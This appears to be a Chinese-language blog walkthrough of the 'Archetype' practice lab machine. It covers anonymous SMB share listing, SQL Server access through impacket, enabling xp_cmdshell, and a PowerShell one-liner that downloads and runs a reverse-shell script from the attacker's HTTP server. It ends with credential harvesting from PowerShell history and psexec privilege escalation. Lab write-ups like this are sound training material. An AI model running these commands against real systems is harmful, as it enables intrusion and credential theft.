靶机-Archetype
#
端口扫描 其中 1433 是 SQL Server 数据库默认使用的端口,445 是著名的文件共享协议(SMB)默认使用的端口。这种文件共享大多应用于局域网环境,很多人认为局域网内是安全的,所以通常会共享一些密码、配置文件、敏感文件之类的供局域网用户使用,没有经过权限配置的文件共享可能默认允许所有人匿名访问共享资源(无需身份认证)
SMB 服务:smbclient 工具,payload:
smbclient -N -L 10.10.10.27/backups/
获取密码,这里要注意:
SQL Server 的身份验证方式有两种:操作系统身份验证和数据库身份验证,此处的参数值应该是操作系统身份验证方式,其前半部分 ARCHETYPE 是靶机的主机名,后半部分 sql_svc 是具有数据库登录权限的操作系统用户名
获取数据库 shell#
首先下载impacket工具
,使用其中的mssqlclient.py
配置 mysql 语句enable_xp_cmdshell
,xp_cmdshell
执行系统命令
获取操作系统普通用户权限#
靶机操作系统是 windows server 2008 r2,此版本默认安装有 powershell,可以从 powershell 入手。有很多利用 powershell 获得的反向 shell 的工具/脚本
powercat 工具安装,但是还不会。。。
本地搭建局域网python3 -m http.server 80
sql 服务器中访问搭建的局域网,然后下载并且运行out.ps1
文件,
payload如下:
xp_cmdshell "powershell "IEX (New-Object
Net.WebClient).DownloadString(\"http://10.10.16.64:80/out.ps1\");"
但好像有问题,总是报错,不能访问到远程主机,哭了。。 主机 shell 得不到了呀。更别说提权了。难受,局域网本地访问也没问题呀,奇怪了。。
终于知道为什么不能下载,原来是防火墙的原因
sudo ufw allow from 10.10.10.27 proto tcp to any port 80,443
反弹 shell 终于成功了,,,哈哈哈 😃
提权#
Notes: When getting into a windows machine, read the powershell history file is a MUST DO!
查看 powershell 的历史命令
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
这表明该 backups 驱动器已使用本地管理员凭据进行了映射。我们可以使用 Impacketpsexec.py 来获得特权 shell。
读 flag cat 不能用,
more \users\administrator\Desktop\root.txt
作者:kzd的前沿思考
出处:https://www.cnblogs.com/Fram3/p/15764239.html
版权:本作品采用「署名-非商业性使用-相同方式共享 4.0 国际」许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通